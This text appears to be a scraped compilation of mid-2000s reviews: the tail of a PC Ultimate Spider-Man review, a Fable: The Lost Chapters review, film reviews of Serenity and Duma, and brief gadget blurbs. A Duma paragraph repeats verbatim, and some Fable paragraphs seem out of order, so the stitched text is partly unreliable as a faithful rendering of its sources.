The methodology for getting around New York has also been simplified, though with mixed results. Spider-Man's webswinging mechanic requires a lot less effort on your part this time around. You can't shoot multiple webs anymore; you're effectively limited to single, standard-swinging webs, as well as a web-boost shot that lets you leap great distances. Venom throws all that webswinging by the wayside, opting to just leap hundreds of feet in the air and occasionally use his tendrils to cover distances quickly, not unlike in the web boost. While all of that's well and good, jumping and swinging around the city just isn't as interesting as it's been in the past. The simplification of the webswing mechanic also seems to have slowed the overall feel of your swinging, and it's just not all that thrilling to swing around the city--which is pretty much the opposite of the case in the past games. Admittedly, it is neat to jump around with Venom, since he does handle differently from Spidey, but there aren't many Venom sequences in the game. Incidentally, regardless of which character you're playing as, you're going to want to use a good dual analog gamepad for this game. Keyboard and mouse controls are too unwieldy for both combat and webswinging.

The city of New York has also been scaled down here, but that's not a detriment. Though there's less area to cover, the areas themselves look a lot better. That's thanks mostly to the game's entirely new art style, which uses a unique cel-shading concept to give every character and set piece a brightly colorful and sharp look. The character models are so sharp looking, in fact, that they look like they've leapt off a comic page--though perhaps that's because the game goes to painstaking lengths to try to emulate the comic book's style, creating multiple cutscenes that frame their shots within the boxes of a comic. All this gives Ultimate Spider-Man a wonderful sense of style that the previous two games lacked. Admittedly, there are still a few problems. The camera can get very uppity, especially in tight spaces, and the PC version suffers from a bad frame rate in a lot of spots, especially when you're webswinging. Turning down effects makes no difference, nor does the resolution. Parts of this game simply don't run well.

Ultimate Spider-Man features no celebrity voice acting, but that's not a problem. The actors who portray the characters do excellent work lending realistic and sometimes appropriately goofy spins to these modernized versions of classic characters. The dialogue is mostly quite sharp, getting Spidey's snarky tone down pat and dealing out a fair number of amusing one-liners. The only failing of the dialogue is that in-game, Spider-Man's wisecracks often repeat ad nauseam and get old quickly. The rest of the audio features plenty of thwacks, whaps, and biffs, as well as a fairly subdued soundtrack that seems to come in and out at random intervals--not because it's broken or anything, but it just isn't quite as well edited as it could have been.

Ultimate Spider-Man is a better game than Treyarch's previous efforts, but it still relies too heavily on the novelty of swinging around the city and beating up the same bad guys over and over again--a novelty made less so by the simplification of both mechanics. It's especially distressing that the developer was clearly able to put together a solid story and some great boss fights, yet was unable to cull together enough of them to make a great game. Serious webheads will get something positive out of Ultimate Spider-Man, but they should do so with one of the console versions, as the PC version of the game isn't the ideal one.

Fable – The Lost Chapters

Fable is an imaginative game that's got enough remarkable, unique moments in it to make it shine.

Some heroes are made when they rise to the occasion. Others build their reputations over time. This latter case is the subject of Fable: The Lost Chapters, a game in which you get to vicariously experience the life of an archetypal fantasy hero, and, in some respects, decide what eventually becomes of him. Originally released for the Xbox last year, Fable was one of the most highly anticipated games since the Xbox's debut, and the latest title overseen by visionary game designer Peter Molyneux since 2001's innovative Black & White. Like that game, Fable invites you to solve problems either by being good or by being evil, and to watch as the effects of your decisions gradually take a noticeable toll on your persona. Fable also features a number of novel elements, such as how your hero's appearance gradually changes with age, and how villagers respond differently to him depending on his reputation, looks, and other factors. These elements serve to significantly differentiate a game that's actually pretty straightforward in terms of how it plays. Beneath the surface, Fable is a well-put-together but standard action adventure, primarily consisting of lots of basic combat and running from point to point. Mind you, this is a decidedly great game, all in all. Its most interesting, riskiest features may lie at the fringes rather than at the core--but they're there.

If you're familiar with the Xbox version of Fable, you'll find that Fable: The Lost Chapters is essentially the same game, though it's been tuned to work well for the PC and gains a significant amount of new content. That is, the 12 months since the release of the original apparently were well spent--this game isn't any worse for wear today. The new Lost Chapters storyline picks up immediately following the conclusion of the original Fable's main quest, challenging you to explore the treacherous north of the world of Albion, and conquer a great threat lurking there. Featuring new places to explore, new items to find, and new monsters to fight, plus lots of new dialogue and cutscenes, the additional content of The Lost Chapters is at least as good as that of the original game, and it blends in seamlessly with the rest. It's like getting an expansion pack together with the original game, and The Lost Chapters helps address one of the original Fable's problems, which is that it was quite short. Fable veterans will of course need to play through the game again in order to get to the new stuff, and the additional quests amount to only a few more hours of gameplay, if you play straight through them. So while fans will surely enjoy the new content, it isn't necessarily enough to justify getting a second copy of the game. And if you're new to Fable, you'll be better off for all the stuff that's been added. Other than the new content, Fable's controls and presentation have been translated very well to the PC, to the point where the game barely shows its console roots.

You begin Fable as a young child, and it's here that you're introduced to the game's moral alignment system, its sense of humor, and its dark edge--as well as its basic controls, which will be mostly intuitive if you've played other third-person perspective games recently. Your first order of business is to earn a few gold pieces with which to purchase a birthday gift for your sister. Whether you make the money by being helpful or by making trouble is up to you. This initial choose-your-own-adventure-style sequence is quite impressive in the amount of freedom and variety it affords you, and it suggests that Fable will constantly challenge you to make moral decisions like the ones presented early on. For example, will you help a little kid fend off a bully, or will you join in on the bullying (or beat them both up)? These decisions are so ethically basic that they're not at all difficult to make, but it's still interesting to see how the game plays out depending on what you do. You'll discover, though, that Fable's introduction is not reflective of most of the game's quests, which don't give you many choices. At any rate, soon after you complete your first main task, something sinister happens. Fortunately for your young character, he is saved by an enigmatic man who transports him to the Heroes' Guild, where he is to be trained to become an adventurer.

Cut to your hero's teenage years. At the Heroes' Guild, you're instructed on how to fight with melee weapons, a bow and arrow, and the powers of will--otherwise known as magic. All three of these fighting styles are relatively simple to use, but they work well. It's possible to lock onto nearby targets, and you can switch between ranged and melee weapons easily. Melee combos are unleashed just by left-clicking repeatedly.

Some foes will block your attacks, but you can penetrate their defenses either by maneuvering behind them or by using a slower, stronger, unblockable strike that becomes available after every few normal strikes. Archery works similarly but is more methodical--the longer you press and hold the attack button, the more fiercely you'll draw your bow, resulting in significant damage per hit. Actually, archery may not seem altogether practical in Fable. It can be plenty effective, but since you'll be fighting most foes single-handedly, and most of them will quickly close the distance between you, toe-to-toe combat proficiency will seem like the obvious first choice. A few flying enemies will require you to put your unlimited arrows to good use, though.

Magic is unquestionably valuable in Fable. You'll start off with a simple lightning attack, but you'll be able to spend experience points on more than a dozen other different spells (and upgrades to those spells). There are spells that do such things as temporarily boost your strength and speed or temporarily cause time to slow down all around you, letting you easily outmaneuver foes. (Descriptions of these spells make them sound very useful, and, in fact, they are.) Magic is a little awkward to use at first: You need to hold down the shift button to access your spells, then you have to use your mousewheel to cycle through your available spells, if you have more than a couple. But this is easy enough to get used to, and worth getting used to sooner rather than later, because magic helps make Fable's frequent battles pretty easy, for better or worse.

You'll face a fairly diverse variety of foes during the course of the game, some of which will seem reasonably smart. Bands of bandits will fire on you with crossbows, switch to swords as you approach, and attempt to flank you. Undead will spring right out of the ground underneath your feet. Creatures resembling werewolves will lunge at you from all directions. Yet all these foes can be defeated handily in groups, using the same types of tactics.

Fable's combat has a pretty good, solid feel to it as you wallop your foes with swords, axes, maces, crossbows, and more. But the combat isn't really a challenge once you inevitably figure out a few key tricks. Items that quickly or instantly restore your health will be available in copious supply, letting you recover your energies in a pinch, even in the midst of battle. You'll also probably end up hoarding numerous "resurrection phials," which automatically restore all your health should you be struck down. Once you learn Fable's controls and figure out its fairly complex leveling-up system, you'll have overcome its greatest challenges.

Of course, you won't be fighting hordes of foes while you're still training at the Heroes' Guild. After the training is complete, you're invited (rather awkwardly, via an onscreen prompt) to continue on to your hero's adulthood, the time during which the vast majority of Fable takes place. You can get through the younger years in about an hour, and the rest of the story is fairly brief and will take you maybe 10 or 12 hours on your first run, including the content of The Lost Chapters--that's if you ignore a few available side quests, though these don't pad the game's length much further. Fortunately, Fable's world is sprinkled with little hidden secrets--collectible special keys, talking demon doors challenging you to open them up in some obscure fashion, concealed treasure chests, and so forth--and these give the game some additional lasting value. Ironically, though, there isn't a clear incentive to play through the entire game over from scratch once you've finished it the first time. Yet, however you choose to spend your time with the game, you should be able to squeeze a good 20 to 30 hours out of it when all is said and done.

Fable's storyline, which is punctuated by an elegant sequence of paintings showing your hero's latest exploits, is mostly linear and starts slowly, after you get past the childhood prologue. Past the halfway point, it actually becomes fairly involved, since its few key characters become relatively fleshed out. However, the hero himself remains silent during all the proceedings, and all the moral decisions you've made have little effect on what happens or how it happens. The game does have multiple endings, depending on your morality and the ultimate decisions you make, but each version of the epilogue is very brief, and it's fairly easy to see the numerous different alternatives without having to play through the game from the beginning. This is partly because your character's morality can be reversed just by visiting one of two different locations in the game, respectively devoted to a good and an evil god. All you need to do is pay a hefty donation and your evil or good deeds will be negated--and, toward the end of the game, you should have plenty of money to spend. The inclusion of these temples seems somehow unfortunate, as they can undermine the deliberate process through which your character's nature normally emerges.

Furthermore, the fact that you may continue exploring the game's world of Albion even after you've finished the main storyline means that you'll be able to see most of what Fable has to offer without having to restart. Part of the appeal of role-playing games that purport to let you live by the consequences of your actions is that they offer significant replay value. However, that's not necessarily true of Fable, though the game does have lots of interesting peripheral content to explore on your first go-round. The thing is, you might miss it if you simply follow Fable's main quest, finish it, and reckon you're done. If that happens, you'll have experienced a quality action adventure game, but you will have missed out on most of what makes Fable special.

It's fun to see your character develop as you play. You can get a nice close-up look at the hero at any time at the touch of a button, and you'll see him visibly age and transform in other ways during his adulthood. It's possible to adorn your hero with different hairstyles and tattoos--which don't have much impact on gameplay (as you'd probably expect), but may nonetheless cause certain villagers to respond to you differently. Your clothing or armor can have a similar effect, but the most interesting visual changes to the hero occur as a result of your moral choices. Act evilly, and soon enough you'll sprout horns, walk with a hunch, and gain blood-red eyes; act like an angel and you'll gradually gain a divine aura around you. There's a dramatic range of appearances possible for your main character, and even though the variations are mostly cosmetic, it's still very impressive. Your character even becomes weathered and scarred from constant battle.

There are other aspects to Fable's personalization system worth noting. Your alignment will gradually give you access to various social gestures--a nasty insult if you're evil, or an apology if you're good, for instance. The Lost Chapters adds more on top of the original game's options. Using these in civilized settings yields results that are, at least, frequently funny. Ultimately, there really isn't much to character interaction in Fable. However, gesticulating in various ways and watching as villagers react differently to you based on your attire and reputation can be entertaining for a while. So can a few different tavern games available at the drinking establishments in Fable's handful of villages. The extracurricular activities don't stop there: You may also get married (and divorced), which is another fairly basic process that leads to some amusing results; expect your spouse to have some choice words for you whenever you change your appearance. You may purposely or inadvertently commit all kinds of different crimes while in town, from brandishing a weapon to breaking windows to shoplifting, and the guards will come looking for you if you do--you can pay a fine, flee, or try to fight them. There are other nice little details here and there. As day turns to night, villagers will light street lamps and shutter their doors. Taverns are always bustling with customers. The way the game's nonplayer characters act and respond to you eventually becomes pretty transparent, but messing around with them as though this were a virtual ant farm can be rewarding. For most of the structured gameplay, you'll be undertaking quests that are the stuff of standard-issue fantasy. Rescue missions, dungeon crawls, showdowns against powerful foes, and all the other clichés make their appearances in Fable. None of the quests take very long to accomplish, thanks partly to your hero's convenient ability to teleport around the world, as well as to the onscreen minimap that always points you in the right direction. Fable's quests offer a bit of varied challenge in how they allow you to "boast" for additional rewards by agreeing to take on bigger risks. Basically, you're able to take dares on certain quests, such as vowing to go through a mission "naked" (just in your Union Jack-emblazoned underpants, that is), or to slay every foe from the mission's beginning to end, or to complete your objectives in a certain period of time. These boasts can add an extra bit of challenge and variety, but they aren't really necessary. The penalty for a failed boast isn't severe, but if you fail the quest altogether...you have no choice but to restart that quest and keep trying until you succeed. It's strangely disorienting to be required to restart a simple side quest from the beginning when Fable is presumably a game about living with the consequences of your actions. Again, though, the game isn't hard, so the threat of having to replay quests doesn't turn out to be much of a problem.

The game's various environments, which include your standard fantasy trappings like forests, swamps, caverns, and graveyards, are dense with color and little atmospheric touches. Weather effects look very real, and other effects for spells and such are also great. But the best-looking aspect of the game is certainly the hero himself and his gradual metamorphosis into whatever you're trying to turn him into. Watching your hero take shape over time is a one-of-a-kind experience that, in and of itself, encourages spending lots of time playing Fable.

The same is absolutely true of the audio, which is quite possibly the best part of the game. A beautiful classical-style orchestral score plays pleasantly throughout the game, changing its tone and mood effortlessly to fit each different type of setting and situation. Ambient sound effects match or even surpass the richness of the graphics. The game's voice acting (all of it is British) is of very high quality overall, and there's a ton of spoken dialogue to be heard. You'll occasionally hear some repeated lines as you wander through towns, and this is really the only strike against a game whose sound is amazingly well done.

Fable is an imaginative game that's got enough remarkable, unique moments in it to make it shine. That many of these moments happen to be good for a laugh is all the better. It's true that the game's high points are not always frequent--its ambitions are evident but not always fulfilled, and the pervasively playful spirit of the game sometimes is mired by convention. These trespasses are more than excusable, though. Regardless of how much time you ultimately spend playing Fable, you're not likely to forget the experience for a long while.

As you complete your missions and slay opponents, you'll gain experience points, which you can spend to customize your character and how he actually plays. This leveling-up system is quite good, and unlike some of Fable's novelty elements, it actually adds depth to the gameplay. Basically, you'll get to improve your character's various abilities within three different pools: strength, skill, and will. Strength abilities influence your melee power, toughness, and maximum health. Skill abilities affect your speed, archery, the prices you get from merchants, and your ability to sneak. Will abilities govern your maximum magic power and available spells. Interestingly, you gain experience points in each of these three categories separately, as you fight using melee, archery, and magic, respectively. You also earn a fourth, general type of experience on top of that, which can be spent on any of the three ability sets. All abilities within each of the three pools are available right from the get-go, and it's a lot to take in. Fortunately, some helpful text and voice-over clearly explains how each option may be useful to you.

Though this system works very well, it discourages pure specialization. You might start out hoping to become the best possible fighter or magic user...but eventually, you'll find yourself having to spend exponentially more experience for limited gains in your chosen field, versus spending relatively small quantities of experience points to gain proficiency in new skills. So you're almost certainly going to wind up as some sort of hybrid fighter/archer/wizard, though you'll still probably lean toward specific sets of skills, of which there are numerous viable combinations.

The sum total of Fable's elements is a decidedly interesting mix that invites, and often rewards, exploration and experimentation. That's great, but for what it's worth, the game doesn't entirely succeed at making you feel like you are the hero. The epic premise doesn't quite translate into an epic experience. This is mostly because the form and structure of the gameworld feel contrived. Fable consists of a sequence of relatively small, winding, interconnected maps, separated by brief but noticeable load times. The hero himself has no personality (and never speaks, except for a few short, gruff phrases when you make him emote), and the game's cookie-cutter nonplayer characters, while often amusing, don't come across as lifelike. Fable's juxtaposition of cheeky humor and surprisingly serious story themes also seems odd, as the humor tends to overshadow aspects of the story that otherwise could have seemed much more dramatic, had the game maintained a more even tone. All of this makes the world of Fable seem very much like a sandbox (in which your imagination will be the key to your enjoyment) rather than a fully realized and cohesive fantasy setting--the kind that really draws you in and makes you feel like a part of it. In Fable, you'll often feel more like the director than like the star of the show.

Fable is excellent from a technical standpoint, featuring highly detailed visuals brought to life by soft, colorful ambient lighting, which gives the entire game an appropriately dreamlike, wispy look. Little details are everywhere, and character animations are nicely exaggerated, making the inhabitants of Fable appear larger than life.

Serenity

Joss Whedon's intimate sci-fi epic "Serenity" rockets straight out of the universe of second chances. Whedon seems to have cornered this market, having penned 1992's lackluster "Buffy the Vampire Slayer" feature, only to resurrect it five years later as the cult TV phenomenon starring Sarah Michelle Gellar. "Serenity" takes the reverse course. It's the sequel to Whedon's groundbreaking "Firefly" TV series, which was mishandled (episodes aired out-of-order), then unceremoniously dumped by the suits at Fox. Fans protested and DVD sales of the series helped Whedon push "Firefly" through the black hole of cancellation to the silver screen.

And oh, what a movie it is. "Serenity" is a brash, funny, action-packed bit of sci-fi ecstasy—and a giant raspberry to the execs who let "Firefly" fall out of the sky. But you needn't have seen a single episode to be blown away by "Serenity." Its first five minutes plunges audiences into Whedon's esoteric universe of outlaws living on the fringe of the Wild West-style frontier of space. The movie begins with Capt. Malcolm "Mal" Reynolds (Nathan Fillion) struggling to keep the crew of spaceship Serenity together. Taking on fugitive siblings Simon (Sean Maher) and telepathic River (Summer Glau) has caused considerable strain on Serenity's fractured crew of smugglers—mostly because the unstable, unpredictably violent River is an escaped government she-weapon. The Alliance, Whedon's totalitarian galactic state, wants River back—even at the cost of starting a small interplanetary war. Actor Chiwetel Ejiofor plays Serenity's deadly nemesis, an unnamed "operative" with steely resolve and murderous methods. The calm, polite Ejiofor is the greatest asset in Whedon's war of ideologies. "[When] I start a fighting a war, I guarantee you'll see something new," Reynolds says.

It's a promise Whedon keeps. Outer space as the new western frontier isn't anything new. In fact, when Gene Roddenberry was trying to sell "Star Trek" to networks, he pitched it as "'Wagon Train' to the stars." Whedon takes the metaphor even further. Characters talk in an artificial "OK Corral" vernacular (people are always "fixin'" to do something), pausing only to swear in Chinese. Mal's love interest, Inara (Morena Baccarin), works as a Companion, a revered class of intergalactic saloon courtesan. Space battles are at a minimum, since Serenity doesn't have any guns. No aliens. No transporter beams. No phasers on stun. "Firefly" was never about the techie stuff, and unlike its peers, "Serenity" isn't designed to sell action figures (although, yes, there are toys). Instead, it's a character-driven series about fundamental human issues: love, the morality of genetic engineering, big government, etc. Even so, "Serenity's" special effects look remarkable. Instead of offering intricately designed space fights on a static screen, the action sequences look as if they were captured on a hand-held camera, often out-of-focus and blazingly fast, much like the human eye sees. But Whedon's primary allegiance remains with the human heart. Though the Inara/Mal relationship gets short shrift (mostly due to screen time allotted them, one suspects), pixieish mechanic Kaylee (Jewel Staite) finally reveals her twitterpation with Simon. Second-in-command Zoe (Gina Torres), her pilot husband Wash (Alan Tudyk) and mercenary Jayne (Adam Baldwin) also faces major changes—but keeping the Serenity clan intact remains the central theme. "Serenity" carries an unexpectedly high body count and is far nastier than audiences may bargain for. Mal's face-off with the Alliance's operative feels a tad unsatisfying, if only because it defies convention. Then again, Whedon has made a career thumbing his nose as convention. With "Serenity," Whedon has his cake and eats it too—wrapping up most of the major plots and themes of "Firefly," while leaving the door open (just a crack) for a new series—maybe even another film. This second chance deserves a third.

'Serenity' Written and directed by Joss Whedon; cinematography by Jack N. Green; production design by Barry Chusid; music by David Newman; edited by Lisa Lassek; produced by Barry Mendel. A Universal Pictures release; opens Friday. Running time: 1:59. MPAA rating: Rated PG-13 (for sequences of intense violence and action, and some sexual references). Capt. Malcolm "Mal" Reynolds - Nathan Fillion Zoe - Gina Torres Hoban "Wash" Washburn - Alan Tudyk Jayne Cobb - Adam Baldwin Kaylee Frye - Jewel Staite Dr. Simon Tam - Sean Maher River Tam - Summer Glau Shepherd Book - Ron Glass Mr. Universe - David Krumholtz The Operative - Chiwetel Ejiofor

Duma

"Duma" is an astonishing film by Carroll Ballard, the director who is fascinated by the relationship between humans, animals and the wilderness. He works infrequently, but unforgettably. Perhaps you have seen his "The Black Stallion" (1979), about a boy and a horse who are shipwrecked, and begin a friendship that leads to a crucial horse race. Or his "Never Cry Wolf" (1983), based on the Farley Mowat book about a man who goes to live in the wild with wolves. Or the wonderful "Fly Away Home" (1996), about a 13-year-old girl who solos in an ultralight aircraft, leading a flock of pet geese south from Canada. The wolf and geese stories were, incredibly, based on fact. So, perhaps even more incredibly, is "Duma." There really was a boy and a cheetah, written about in the book How It Was With Dooms, by Xan Hopcraft and his mother, Carol Cawthra Hopcraft. Even more to the point: This movie shows a real boy and a real cheetah (actually, four cheetahs were used). There are no special effects. The cheetah is not digitized. What we see on the screen is what is happening, and that lends the film an eerie intensity. Animals are fascinating when they are free to be themselves; when they are manipulated by CGI into cute little actors who behave on cue, what's the point? How is this film possible? There are shots showing a desert empty to the horizon, except for the boy and the cheetah. No doubt handlers are right there out of camera range, ready to act in an emergency, but it is clear the filmmakers and the boy trust the animals they are working with. True, cheetahs are a special kind of big cat; Wikipedia informs us, "Because cheetahs are far less aggressive than other big cats, cubs are sometimes sold as pets." Yes, but a pet that can, as Xan tells his dad (Campbell Scott) "outrun your Porsche." A pet that is a carnivore. It would seem that Duma can be trusted, but as W. G. Sebald once observed, "Men and animals regard each other across a gulf of mutual incomprehension."

The 12-year-old boy helped raise the cheetah, after he and his father found it as a cub. The boy, named Xan, lives on a farm in South Africa, where he and Duma form a strong bond, but their friendship cannot last forever. An emergency forces the family to move to the city, and Xan realizes that Duma, now fully grown, should be returned to the wild. There might be reasonable ways of doing that. Perhaps Xan (Alex Michaeletos) could call the animal welfare people. Instead, without telling his mother (Hope Davis), he decides to personally return Duma to the wilderness. There is a scene of the cheetah riding in the sidecar of an old motorcycle, which Xan drives into the desert. It could be a cute scene, maybe funny, in a different kind of movie, but "Duma" takes itself seriously, and is not a cute children's story but a grand tale of adventure. Xan has courage but not a lot of common sense. He is headed into the Kalahari Desert, where to get lost is, usually, to die. Of course the motorcycle runs out of gas. Then he meets another wanderer in the desert, named Ripkuna (Eamonn Walker), who once worked in the mines of Johannesburg but now prefers to work alone, perhaps for reasons we would rather not know. He warns Xan of the dangers ahead ("That is a place of many teeth, my friend; that is a place to die"). He has the knowledge to save the boy and the cheetah. But what is his agenda? The 12-year-old boy helped raise the cheetah, after he and his father found it as a cub. The boy, named Xan, lives on a farm in South Africa, where he and Duma form a strong bond, but their friendship cannot last forever. An emergency forces the family to move to the city, and Xan realizes that Duma, now fully grown, should be returned to the wild. There might be reasonable ways of doing that. Perhaps Xan (Alex Michaeletos) could call the animal welfare people. Instead, without telling his mother (Hope Davis), he decides to personally return Duma to the wilderness. There is a scene of the cheetah riding in the sidecar of an old motorcycle, which Xan drives into the desert. It could be a cute scene, maybe funny, in a different kind of movie, but "Duma" takes itself seriously, and is not a cute children's story but a grand tale of adventure. Xan has courage but not a lot of common sense. He is headed into the Kalahari Desert, where to get lost is, usually, to die. Of course the motorcycle runs out of gas. Then he meets another wanderer in the desert, named Ripkuna (Eamonn Walker), who once worked in the mines of Johannesburg but now prefers to work alone, perhaps for reasons we would rather not know. He warns Xan of the dangers ahead ("That is a place of many teeth, my friend; that is a place to die"). He has the knowledge to save the boy and the cheetah. But what is his agenda?

And if Duma can be trusted, can the African man, Ripkuna? Where is he leading them? He must know that a reward has been posted for the missing boy, and that a tame cheetah can be sold for a good amount of money. While these questions circle uneasily in our minds, "Duma" creates scenes of wonderful adventure. The stalled motorcycle is turned into a wind-driven land yacht. A raft trip on a river involves rapids and crocodiles. The cheetah itself plays a role in their survival. And the movie takes on an additional depth because Xan is not a cute one-dimensional "family movie" child, and Ripkuna is freed from the usual cliches about noble and helpful wanderers. These are characters free to hold surprises in the real world. Watching this movie, absorbed by its storytelling, touched by its beauty, fascinated by the bond between the boy and the animal, I was also astonished by something else: The studio does not know if it is commercial! The most dismal stupidities can be inflicted on young audiences, but let a family movie come along that is ambitious and visionary, and distributors lose confidence. It's as if they fear some movies are better than the audience can handle. "Duma" has had test runs in the Southwest. Now it opens in Chicago, and the box office performance here will decide its fate. That is not a reason to see it. Moviegoers do not buy tickets to "support" a movie, nor should they. The reason to see "Duma" is that it's an extraordinary film, and intelligent younger viewers in particular may be enthralled by it.

Tux iPod Stand

The Plasticsmith raises the art of fetish to new level with their Tux iPod stand. This lucite beastie comes in two flavors, Tilt and Upright, and accentuates your iPod like nothing else in the world, aside from a silk scarf and a beret. Sony Bean

The Sony Bean, (named so because it is shaped like a bean) is a small flash MP3 player with a one-line OLED screen. It is described by Sony Corp. as “Playful, Powerful, and Compact.” It plays MP3s & Sony’s Atrac3plus format. It has a pop-up USB connector. Sony claims that it can run for 50 hours on one charge. The beans are available in different flavors or colours: Tropical Ice (Blue), Cotton Candy (Pink), Licorice (Black) and Drowned Cadaver (White). There will even be a model with a built-in FM tuner. And it claims that it support’s Sony’s CONNECT service.

Astone Allure Series of Stainless Steel MP3 Players

Check out this high quality stainless steel construction MP3 players. It plays MP3, WMA & WMA DRM, has a FM Radio, Voice Recording and mass data storage function. It even has MP3 Line-In Encoding for recording from external audio sources. You can listen and record FM radio simultaneously. It is USB2.0-compliant, comes in a stainless steel/black casing, and will be available in 256, 512 MB and 1GB capacities. There are three different versions of the players & the main differences between the three versions are... their shape. One of them is shaped like a dull rectangle, another like a circle, & the third one as a triangle. Known not are prices yet.

Star Wars-branded Alienware PCs

Alienware has created a Star Wars-branded desktop system. The special Aurora models are available in Dark Side and Rebel Alliance flavors. The systems come equipped with the AMD Athlon 64 FX-55 CPU. They’ll be on sale to the public soon for a yet undisclosed price. Max Shooter Console PS/2 Adapter for X-box & PS2

Well the name says it all. This peripheral will finally give the PC gamers a chance to prove themselves when playing on PS2 & X-box. Especially if u are playing Xbox Live. Simply plug in this device, then connect a PS/2 keyboard and mouse into it and you are ready to play with some of the default configurations already saved. The Max Shooter comes preloaded with configurations for many of the latest FPS games out and also allow for customization. The actual adapter is small in size and doesn’t hog any serious amount of extra space. The XBOX version features an extra slot on the backside of the adapter for a memory card to plug in.

Logitech MX 5000 LCD Keyboard

Logitech has released an LCD keyboard for the regular computer users. This keyboard has a slew of interesting features including an external temperature sensor, a ‘dashboard’ displaying the time and current user, along with media and email notifications. There’s even a feature that turns the keyboard itself into a calculator, using the keypad, and then pastes the results into the clipboard. Plus it’s cordless. Super cool. Logitech G15 Gaming Keyboard

Logitech has finally released a keyboard tailored to the computer gamer. The new Logitech G15 has some nice features that are actually tailor-made for gamers. The most acknowledged feature is probably the LCD screen on the keyboard. Keyboard macros can be setup on the physical keyboard while in game. Also while not gaming the LCD screen can read media information, display CPU information, email alerts and the keyboard even comes with a software development kit so the coding gamers can write their own programs to display information on the LCD. Backlit keys and a “gaming button” that disable the windows key are also nice.

OziQ All-In-One PC

All-in-one PCs have been around for a while now, but this one is pretty unique. Tucana Innovations, an Australian company, has fitted the entire PC, optical drive and all, behind a standard LCD panel. Good for people u like the design of the Mac, it is useful for being used as small desktops, or in libraries, kiosks, etc. LG B2250 Wafer Thin

LG Corp. is crafting a new tri-band GSM phone that is just 15mm (.59”) that right just 15mm thin. Before you bay for my blood & compare this to the Siemens CC75 phone which is .50” let me tell you the other features. It features a 262k TFT screen and a multi-color backlight. It is a Tri-Band phone with GPRS, WAP, Java, VGA-camera, 40-tones polyphony, MMS, SMS and EMS, Measures converter, Calculator and World Time. It runs on a Li-Ion 780 mAh battery, which gives you a Talk time of up to 3.5 hours and Standby time up to 250 hours.

I-mate SP3i

This is a hardcore smart phone for those hardcore mobile warriors of today. I-mate sports Windows Mobile 2003 edition for a giant explosion of PDA/smart phone capabilities. This phone has it all: Internet Explorer, Media Player, Bluetooth, expandable memory, IR port, email, USB charging, large screen, extra batteries and even a calculator. Motorola RAZRBerry

The new Motorola RAZR features Windows Mobile OS 5 and sports the new Freescale Neptune LTE + Intel Bulverde Chipset. It is a Quadband GSM phone,

with GPRS (Class 10), EDGE (Class 6), 64 MB Memory (Less compared to Nokia N91) 128 MB Flash Memory, Mini SD Card Slot, 2.4” Display, Bluetooth, IrDA, 1.3 Mega pixel (1280x960) Camera with Integrated flash, Dual Stereo speakers, Thumbwheel, 5 way Nav Key,Left and Right soft keys, Dedicated Camera Key, Voice Recognition software for Voice Activated Dialing, High level of Personalization options, light weight only 115g with Battery & cards. Comes with a 1130 mAh (TBD) battery, which has a talk time of 4 hours & standby time of 8 days. It is in direct competition to blackberry & other smartphones. Bluetooth Wireless Module for iPod

FM transmitters, step aside. Bluetooth audio transmitters are the wave of the future. Scosche has just released a Bluetooth wireless interface for iPod and other MP3 players that will enable streaming audio from your portable player to your car or home receiver. It connects directly to the headphone jack, and transmits to a receiver connected to either a car’s head unit or home audio system.

Pioneer VSA-AX4AVi and VSX-AX2AV

Pioneer just dropped two new receivers, the VSA-AX4AVi and the VSX-AX2AV. Both are 7-channel amplifiers, they support HDMI & WMA9 encoding. The VSA-AX4AVi is tres hot because it accepts USB connections from all kinds of audio players including the Apple iPod. Otherwise, the differences are pretty standard: the 7-channel VSA-AX4AVi rocks at 220W per channel and the VSX-AX2AV runs 200Wx7 channels. Denon Smart Life S-101

The Denon Smart Life S-101 is sweet enough as your standard home theater system: couple of flat speakers, 100W subwoofer, and an adorably packaged progressive-scan DVD player. But the real cherry on the top here is that it plays super-nicely with your existing iPod. You connect it via its dock connector, which allows you to control your iPod from the remote and charges the iPod at the same time. It then displays a “virtual iPod” on the television screen that displays your songs and the iPod controls, and if you have photos stored on it, you can view them as well. Will be launched around September.

TonePro USB-Powered Hendrix

Line 6, makers of digital audio gear has a new line of hardware due this season called the TonePro. Plug a guitar, bass, or mike into the TonePro, jack it into a CPU, and you have a clean sounding room along with a software UI that looks just like an amp. TonePort UX1 and UX2 hardware interfaces are USB-powered devices that include Line 6 GearBox modeling software, which provides a must-have collection of guitar and bass amp/cab models, stompbox and studio effects, and models of high-end studio microphone preamps. Both units support 44.1/48KHz with 16/24-bit recording, a 96KHz mode, and drivers for ASIO, WDM, and Core Audio. GPX2 - PEPpy PEP

The GPX2 is a personal entertainment player (PEP) with a nice, 3.5” LCD and support for just about everything under the sun, including DRMed WMA et al. It runs on Linux. It has plenty of games already available under MAME and NES emulators and it plays back pirate friendly OGG and DivX formats. This ARM-based player contains 64MB built-in memory and supports SD. Nice and thin and sexy.

Archos AV700

This sweet baby has a very cool & sweet 7-inch screen with 262k colors which will blow you away. If not that then surely the Hugh 100 GB storage space will. It has the ability to store a wide variety of video and audio formats, and is able to act as a Windows Media device. The screen sports a handy layer of anti-reflective coating. At its maximum setting, brightness levels are very good indeed, but the contrast is ok. It has a very small buttons for navigation, but is of good quality & responds very well. It comes bundled with a TV Docking Pod which lets you to use the player either as a source or as a recording or playback device. It has an integrated USB 2.0 mini jack, that lets the device mount either as a USB Mass Storage Device or as a Windows Media device (as part of its ability to synchronize with Windows Media Player 10. Also present is a USB host connector, which lets users transfer media directly from compatible devices such as digital cameras or other audio/video players - extremely handy. It is presently available in 2 configurations of 40GB and 100 GB.

Creative Zen Vision PMP

It features a 30 GB of hard drive space, a 3.7-inch 262K colour screen and support for a flurry of audio and video formats, this pocket-sized Creative Zen Vision is set to make an impact. The device supports audio playback, photo viewing and video playback, with the user interface being navigated by means of a navigational array flanking the screen on its right side. It plays numerous formats including DRM files. It will also be able to download music from a number of online offerings such as Napster To Go, Yahoo! Music Unlimited and more. It has a USB 2.0 connection port and an integrated CompactFlash Type II slot to allow for direct transfer of media to the internal hard drive of the unit. Also present is Composite video out, with support for NTSC and PAL standards. In addition to its media capabilities, the Zen Vision also comes with software which allows for the synchronization of Contacts, Calendar and Tasks data from Microsoft Outlook. It has a a battery life of up to 4.5 hours for video playback. The Creative Zen Vision is immediately available for in the US. It is available in either pearl white or black.

LG PM70

